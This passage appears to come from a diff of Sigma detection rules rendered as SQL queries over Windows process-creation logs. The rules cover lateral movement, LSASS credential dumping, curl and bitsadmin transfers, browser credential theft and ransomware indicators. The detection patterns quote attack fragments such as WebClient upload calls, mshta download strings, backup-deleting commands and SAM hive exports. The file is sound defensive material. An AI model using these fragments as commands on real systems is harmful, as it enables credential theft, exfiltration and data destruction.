'%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", - "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "status": "experimental", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "status": "experimental", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Non Interactive PowerShell Process Spawned", - "id": "f4bbd493-b796-416e-bbf2-121235348529", - "status": "test", - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate programs executing PowerShell scripts" + "Administrative activity" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_non_interactive_execution.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "status": "experimental", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out 